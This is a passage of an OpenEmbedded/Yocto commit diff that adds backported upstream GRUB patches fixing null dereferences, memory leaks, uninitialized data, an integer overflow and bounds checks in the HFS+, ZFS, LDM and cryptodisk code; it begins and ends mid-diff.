++       if (*(int *)((char *)upptr + up->uparams_offs) >= upptr->rmargin)
++         {
++           __argp_failure (state, 0, 0,
++-                          dgettext (state->root_argp->argp_domain,
+++                          dgettext (state == NULL ? NULL
+++                                    : state->root_argp->argp_domain,
++                                     "\
++ ARGP_HELP_FMT: %s value is less than or equal to %s"),
++                           "rmargin", up->name);
diff --git a/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
new file mode 100644
index 0000000000..4f43fcf7d5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
@@ -0,0 +1,53 @@
+From 244dc2b1f518635069a556c424b2e7627f0cf036 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:57:14 +0000
+Subject: [PATCH] gnulib/regexec: Fix possible null-dereference
+
+It appears to be possible that the mctx->state_log field may be NULL,
+and the name of this function, clean_state_log_if_needed(), suggests
+that it should be checking that it is valid to be cleaned before
+assuming that it does.
+
+Fixes: CID 86720
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0b7f347638153e403ee2dd518af3ce26f4f99647]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist                             |  1 +
+ .../lib/gnulib-patches/fix-regexec-null-deref.patch  | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 96d7e69..d27d3a9 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+ 
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+new file mode 100644
+index 0000000..db6dac9
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/regexec.c	2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c	2020-11-05 10:55:09.621542984 +0000
++@@ -1692,6 +1692,9 @@
++ {
++   Idx top = mctx->state_log_top;
++
+++  if (mctx->state_log == NULL)
+++    return REG_NOERROR;
+++
++   if ((next_state_log_idx >= mctx->input.bufs_len
++        && mctx->input.bufs_len < mctx->input.len)
++       || (next_state_log_idx >= mctx->input.valid_len
diff --git a/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
new file mode 100644
index 0000000000..0507e0cd66
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
@@ -0,0 +1,55 @@
+From 512b6bb380a77233b88c84b7a712896c70281d2f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 18:04:22 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized re_token
+
+This issue has been fixed in the latest version of gnulib, so to
+maintain consistency, I've backported that change rather than doing
+something different.
+
+Fixes: CID 73828
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03477085f9a33789ba6cca7cd49ab9326a1baa0e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist                          |  1 +
+ .../gnulib-patches/fix-regcomp-uninit-token.patch | 15 +++++++++++++++
+ 2 files changed, 16 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index d27d3a9..ffe6829 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+ 
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+new file mode 100644
+index 0000000..02e0631
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+@@ -0,0 +1,15 @@
++--- a/lib/regcomp.c	2020-11-24 17:06:08.159223858 +0000
+++++ b/lib/regcomp.c	2020-11-24 17:06:15.630253923 +0000
++@@ -3808,11 +3808,7 @@
++ create_tree (re_dfa_t *dfa, bin_tree_t *left, bin_tree_t *right,
++ 	     re_token_type_t type)
++ {
++-  re_token_t t;
++-#if defined GCC_LINT || defined lint
++-  memset (&t, 0, sizeof t);
++-#endif
++-  t.type = type;
+++  re_token_t t = { .type = type };
++   return create_token_tree (dfa, left, right, &t);
++ }
++ 
diff --git a/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
new file mode 100644
index 0000000000..1190b0d090
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
@@ -0,0 +1,41 @@
+From c529ca446424f1a9c64f0007dfe31fa7645d13ac Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:44:10 +0000
+Subject: [PATCH] io/lzopio: Resolve unnecessary self-assignment errors
+
+These 2 assignments are unnecessary since they are just assigning
+to themselves.
+
+Fixes: CID 73643
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=59666e520f44177c97b82a44c169b3b315d63b42]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/io/lzopio.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/grub-core/io/lzopio.c b/grub-core/io/lzopio.c
+index 3014485..a7d4425 100644
+--- a/grub-core/io/lzopio.c
++++ b/grub-core/io/lzopio.c
+@@ -125,8 +125,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ 			  sizeof (lzopio->block.ucheck)) !=
+ 	  sizeof (lzopio->block.ucheck))
+ 	return -1;
+-
+-      lzopio->block.ucheck = lzopio->block.ucheck;
+     }
+ 
+   /* Read checksum of compressed data.  */
+@@ -143,8 +141,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ 			      sizeof (lzopio->block.ccheck)) !=
+ 	      sizeof (lzopio->block.ccheck))
+ 	    return -1;
+-
+-	  lzopio->block.ccheck = lzopio->block.ccheck;
+ 	}
+     }
+ 
diff --git a/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
new file mode 100644
index 0000000000..19d881c1ca
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
@@ -0,0 +1,34 @@
+From f55ffe6bd8b844a8cd9956702f42ac2eb96ad56f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:29:59 +0000
+Subject: [PATCH] zstd: Initialize seq_t structure fully
+
+While many compilers will initialize this to zero, not all will, so it
+is better to be sure that fields not being explicitly set are at known
+values, and there is code that checks this fields value elsewhere in the
+code.
+
+Fixes: CID 292440
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2777cf4466719921dbe4b30af358a75e7d76f217]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/zstd/zstd_decompress.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/zstd/zstd_decompress.c b/grub-core/lib/zstd/zstd_decompress.c
+index 711b5b6..e4b5670 100644
+--- a/grub-core/lib/zstd/zstd_decompress.c
++++ b/grub-core/lib/zstd/zstd_decompress.c
+@@ -1325,7 +1325,7 @@ typedef enum { ZSTD_lo_isRegularOffset, ZSTD_lo_isLongOffset=1 } ZSTD_longOffset
+ FORCE_INLINE_TEMPLATE seq_t
+ ZSTD_decodeSequence(seqState_t* seqState, const ZSTD_longOffset_e longOffsets)
+ {
+-    seq_t seq;
++    seq_t seq = {0};
+     U32 const llBits = seqState->stateLL.table[seqState->stateLL.state].nbAdditionalBits;
+     U32 const mlBits = seqState->stateML.table[seqState->stateML.state].nbAdditionalBits;
+     U32 const ofBits = seqState->stateOffb.table[seqState->stateOffb.state].nbAdditionalBits;
diff --git a/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
new file mode 100644
index 0000000000..af9fcd45cc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
@@ -0,0 +1,43 @@
+From 0da8ef2e03a8591586b53a29af92d2ace76a04e3 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 09:49:59 +0000
+Subject: [PATCH] kern/partition: Check for NULL before dereferencing input
+ string
+
+There is the possibility that the value of str comes from an external
+source and continuing to use it before ever checking its validity is
+wrong. So, needs fixing.
+
+Additionally, drop unneeded part initialization.
+
+Fixes: CID 292444
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bc9c468a2ce84bc767234eec888b71f1bc744fff]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/partition.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/kern/partition.c b/grub-core/kern/partition.c
+index e499147..b10a184 100644
+--- a/grub-core/kern/partition.c
++++ b/grub-core/kern/partition.c
+@@ -109,11 +109,14 @@ grub_partition_map_probe (const grub_partition_map_t partmap,
+ grub_partition_t
+ grub_partition_probe (struct grub_disk *disk, const char *str)
+ {
+-  grub_partition_t part = 0;
++  grub_partition_t part;
+   grub_partition_t curpart = 0;
+   grub_partition_t tail;
+   const char *ptr;
+ 
++  if (str == NULL)
++    return 0;
++
+   part = tail = disk->partition;
+ 
+   for (ptr = str; *ptr;)
diff --git a/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
new file mode 100644
index 0000000000..c1687c75d0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
@@ -0,0 +1,128 @@
+From 0c5d0fd796e6cafba179321de396681a493c4158 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 7 Dec 2020 11:53:03 -0300
+Subject: [PATCH] disk/ldm: Make sure comp data is freed before exiting from
+ make_vg()
+
+Several error handling paths in make_vg() do not free comp data before
+jumping to fail2 label and returning from the function. This will leak
+memory. So, let's fix all issues of that kind.
+
+Fixes: CID 73804
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=23e39f50ca7a107f6b66396ed4d177a914dee035]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 51 ++++++++++++++++++++++++++++++++++++++------
+ 1 file changed, 44 insertions(+), 7 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 58f8a53..428415f 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -554,7 +554,11 @@ make_vg (grub_disk_t disk,
+ 	      comp->segments = grub_calloc (comp->segment_alloc,
+ 					    sizeof (*comp->segments));
+ 	      if (!comp->segments)
+-		goto fail2;
++		{
++		  grub_free (comp->internal_id);
++		  grub_free (comp);
++		  goto fail2;
++		}
+ 	    }
+ 	  else
+ 	    {
+@@ -562,7 +566,11 @@ make_vg (grub_disk_t disk,
+ 	      comp->segment_count = 1;
+ 	      comp->segments = grub_malloc (sizeof (*comp->segments));
+ 	      if (!comp->segments)
+-		goto fail2;
++		{
++		  grub_free (comp->internal_id);
++		  grub_free (comp);
++		  goto fail2;
++		}
+ 	      comp->segments->start_extent = 0;
+ 	      comp->segments->extent_count = lv->size;
+ 	      comp->segments->layout = 0;
+@@ -574,15 +582,26 @@ make_vg (grub_disk_t disk,
+ 		  comp->segments->layout = GRUB_RAID_LAYOUT_SYMMETRIC_MASK;
+ 		}
+ 	      else
+-		goto fail2;
++		{
++		  grub_free (comp->segments);
++		  grub_free (comp->internal_id);
++		  grub_free (comp);
++		  goto fail2;
++		}
+ 	      ptr += *ptr + 1;
+ 	      ptr++;
+ 	      if (!(vblk[i].flags & 0x10))
+-		goto fail2;
++		{
++		  grub_free (comp->segments);
++		  grub_free (comp->internal_id);
++		  grub_free (comp);
++		  goto fail2;
++		}
+ 	      if (ptr >= vblk[i].dynamic + sizeof (vblk[i].dynamic)
+ 		  || ptr + *ptr + 1 >= vblk[i].dynamic
+ 		  + sizeof (vblk[i].dynamic))
+ 		{
++		  grub_free (comp->segments);
+ 		  grub_free (comp->internal_id);
+ 		  grub_free (comp);
+ 		  goto fail2;
+@@ -592,6 +611,7 @@ make_vg (grub_disk_t disk,
+ 	      if (ptr + *ptr + 1 >= vblk[i].dynamic
+ 		  + sizeof (vblk[i].dynamic))
+ 		{
++		  grub_free (comp->segments);
+ 		  grub_free (comp->internal_id);
+ 		  grub_free (comp);
+ 		  goto fail2;
+@@ -601,7 +621,12 @@ make_vg (grub_disk_t disk,
+ 	      comp->segments->nodes = grub_calloc (comp->segments->node_alloc,
+ 						   sizeof (*comp->segments->nodes));
+ 	      if (!lv->segments->nodes)
+-		goto fail2;
++		{
++		  grub_free (comp->segments);
++		  grub_free (comp->internal_id);
++		  grub_free (comp);
++		  goto fail2;
++		}
+ 	    }
+ 
+ 	  if (lv->segments->node_alloc == lv->segments->node_count)
+@@ -611,11 +636,23 @@ make_vg (grub_disk_t disk,
+ 
+ 	      if (grub_mul (lv->segments->node_alloc, 2, &lv->segments->node_alloc) ||
+ 		  grub_mul (lv->segments->node_alloc, sizeof (*lv->segments->nodes), &sz))
+-		goto fail2;
++		{
++		  grub_free (comp->segments->nodes);
++		  grub_free (comp->segments);
++		  grub_free (comp->internal_id);
++		  grub_free (comp);
++		  goto fail2;
++		}
+ 
+ 	      t = grub_realloc (lv->segments->nodes, sz);
+ 	      if (!t)
+-		goto fail2;
++		{
++		  grub_free (comp->segments->nodes);
++		  grub_free (comp->segments);
++		  grub_free (comp->internal_id);
++		  grub_free (comp);
++		  goto fail2;
++		}
+ 	      lv->segments->nodes = t;
+ 	    }
+ 	  lv->segments->nodes[lv->segments->node_count].pv = 0;
diff --git a/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
new file mode 100644
index 0000000000..ecdb230f76
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
@@ -0,0 +1,28 @@
+From 253485e8df3c9dedac848567e638157530184295 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 7 Dec 2020 10:07:47 -0300
+Subject: [PATCH] disk/ldm: If failed then free vg variable too
+
+Fixes: CID 73809
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e0b83df5da538d2a38f770e60817b3a4b9d5b4d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 428415f..54713f4 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -199,6 +199,7 @@ make_vg (grub_disk_t disk,
+     {
+       grub_free (vg->uuid);
+       grub_free (vg->name);
++      grub_free (vg);
+       return NULL;
+     }
+   grub_memcpy (vg->uuid, label->group_guid, LDM_GUID_STRLEN);
diff --git a/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
new file mode 100644
index 0000000000..26932f674c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
@@ -0,0 +1,50 @@
+From 3e1d2f1959acbe5152cdd5818d495f6455d1a158 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 10:00:51 +0000
+Subject: [PATCH] disk/ldm: Fix memory leak on uninserted lv references
+
+The problem here is that the memory allocated to the variable lv is not
+yet inserted into the list that is being processed at the label fail2.
+
+As we can already see at line 342, which correctly frees lv before going
+to fail2, we should also be doing that at these earlier jumps to fail2.
+
+Fixes: CID 73824
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=156c281a1625dc73fd350530630c6f2d5673d4f6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 54713f4..e82e989 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -321,7 +321,10 @@ make_vg (grub_disk_t disk,
+ 	  lv->visible = 1;
+ 	  lv->segments = grub_zalloc (sizeof (*lv->segments));
+ 	  if (!lv->segments)
+-	    goto fail2;
++	    {
++	      grub_free (lv);
++	      goto fail2;
++	    }
+ 	  lv->segments->start_extent = 0;
+ 	  lv->segments->type = GRUB_DISKFILTER_MIRROR;
+ 	  lv->segments->node_count = 0;
+@@ -329,7 +332,10 @@ make_vg (grub_disk_t disk,
+ 	  lv->segments->nodes = grub_calloc (lv->segments->node_alloc,
+ 					     sizeof (*lv->segments->nodes));
+ 	  if (!lv->segments->nodes)
+-	    goto fail2;
++	    {
++	      grub_free (lv);
++	      goto fail2;
++	    }
+ 	  ptr = vblk[i].dynamic;
+ 	  if (ptr + *ptr + 1 >= vblk[i].dynamic
+ 	      + sizeof (vblk[i].dynamic))
diff --git a/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..dd7fda357d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
@@ -0,0 +1,50 @@
+From 2550aaa0c23fdf8b6c54e00c6b838f2e3aa81fe2 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 21 Jan 2021 11:38:31 +0000
+Subject: [PATCH] disk/cryptodisk: Fix potential integer overflow
+
+The encrypt and decrypt functions expect a grub_size_t. So, we need to
+ensure that the constant bit shift is using grub_size_t rather than
+unsigned int when it is performing the shift.
+
+Fixes: CID 307788
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a201ad17caa430aa710654fdf2e6ab4c8166f031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/cryptodisk.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/disk/cryptodisk.c b/grub-core/disk/cryptodisk.c
+index 5037768..6883f48 100644
+--- a/grub-core/disk/cryptodisk.c
++++ b/grub-core/disk/cryptodisk.c
+@@ -311,10 +311,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ 	case GRUB_CRYPTODISK_MODE_CBC:
+ 	  if (do_encrypt)
+ 	    err = grub_crypto_cbc_encrypt (dev->cipher, data + i, data + i,
+-					   (1U << dev->log_sector_size), iv);
++					   ((grub_size_t) 1 << dev->log_sector_size), iv);
+ 	  else
+ 	    err = grub_crypto_cbc_decrypt (dev->cipher, data + i, data + i,
+-					   (1U << dev->log_sector_size), iv);
++					   ((grub_size_t) 1 << dev->log_sector_size), iv);
+ 	  if (err)
+ 	    return err;
+ 	  break;
+@@ -322,10 +322,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ 	case GRUB_CRYPTODISK_MODE_PCBC:
+ 	  if (do_encrypt)
+ 	    err = grub_crypto_pcbc_encrypt (dev->cipher, data + i, data + i,
+-					    (1U << dev->log_sector_size), iv);
++					    ((grub_size_t) 1 << dev->log_sector_size), iv);
+ 	  else
+ 	    err = grub_crypto_pcbc_decrypt (dev->cipher, data + i, data + i,
+-					    (1U << dev->log_sector_size), iv);
++					    ((grub_size_t) 1 << dev->log_sector_size), iv);
+ 	  if (err)
+ 	    return err;
+ 	  break;
diff --git a/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
new file mode 100644
index 0000000000..eb459c547f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
@@ -0,0 +1,43 @@
+From 7c1813eeec78892fa651046cc224ae4e80d0c94d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 17:09:31 +0000
+Subject: [PATCH] hfsplus: Check that the volume name length is valid
+
+HFS+ documentation suggests that the maximum filename and volume name is
+255 Unicode characters in length.
+
+So, when converting from big-endian to little-endian, we should ensure
+that the name of the volume has a length that is between 0 and 255,
+inclusive.
+
+Fixes: CID 73641
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2298f6e0d951251bb9ca97d891d1bc8b74515f8c]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/hfsplus.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/grub-core/fs/hfsplus.c b/grub-core/fs/hfsplus.c
+index dae43be..03c3c4c 100644
+--- a/grub-core/fs/hfsplus.c
++++ b/grub-core/fs/hfsplus.c
+@@ -1007,6 +1007,15 @@ grub_hfsplus_label (grub_device_t device, char **label)
+     grub_hfsplus_btree_recptr (&data->catalog_tree, node, ptr);
+ 
+   label_len = grub_be_to_cpu16 (catkey->namelen);
++
++  /* Ensure that the length is >= 0. */
++  if (label_len < 0)
++    label_len = 0;
++
++  /* Ensure label length is at most 255 Unicode characters. */
++  if (label_len > 255)
++    label_len = 255;
++
+   label_name = grub_calloc (label_len, sizeof (*label_name));
+   if (!label_name)
+     {
diff --git a/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
new file mode 100644
index 0000000000..12418858f9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
@@ -0,0 +1,42 @@
+From c757779e5d09719666c3b155afd2421978a107bd Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 16:41:49 +0000
+Subject: [PATCH] zfs: Fix possible negative shift operation
+
+While it is possible for the return value from zfs_log2() to be zero
+(0), it is quite unlikely, given that the previous assignment to blksz
+is shifted up by SPA_MINBLOCKSHIFT (9) before 9 is subtracted at the
+assignment to epbs.
+
+But, while unlikely during a normal operation, it may be that a carefully
+crafted ZFS filesystem could result in a zero (0) value to the
+dn_datalbkszsec field, which means that the shift left does nothing
+and assigns zero (0) to blksz, resulting in a negative epbs value.
+
+Fixes: CID 73608
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a02091834d3e167320d8a262ff04b8e83c5e616d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 36d0373..0c42cba 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2667,6 +2667,11 @@ dnode_get (dnode_end_t * mdn, grub_uint64_t objnum, grub_uint8_t type,
+   blksz = grub_zfs_to_cpu16 (mdn->dn.dn_datablkszsec, 
+ 			     mdn->endian) << SPA_MINBLOCKSHIFT;
+   epbs = zfs_log2 (blksz) - DNODE_SHIFT;
++
++  /* While this should never happen, we should check that epbs is not negative. */
++  if (epbs < 0)
++    epbs = 0;
++
+   blkid = objnum >> epbs;
+   idx = objnum & ((1 << epbs) - 1);
+ 
diff --git a/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
new file mode 100644
index 0000000000..5ded5520e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
@@ -0,0 +1,121 @@
+From 83fdffc07ec4586b375ab36189f255ffbd8f99c2 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 14 Dec 2020 18:54:49 -0300
+Subject: [PATCH] zfs: Fix resource leaks while constructing path
+
+There are several exit points in dnode_get_path() that are causing possible
+memory leaks.
+
+In the while(1) the correct exit mechanism should not be to do a direct return,
+but to instead break out of the loop, setting err first if it is not already set.
+
+The reason behind this is that the dnode_path is a linked list, and while doing
+through this loop, it is being allocated and built up - the only way to
+correctly unravel it is to traverse it, which is what is being done at the end
+of the function outside of the loop.
+
+Several of the existing exit points correctly did a break, but not all so this
+change makes that more consistent and should resolve the leaking of memory as
+found by Coverity.
+
+Fixes: CID 73741
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=89bdab965805e8d54d7f75349024e1a11cbe2eb8]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 30 +++++++++++++++++++++---------
+ 1 file changed, 21 insertions(+), 9 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 0c42cba..9087a72 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
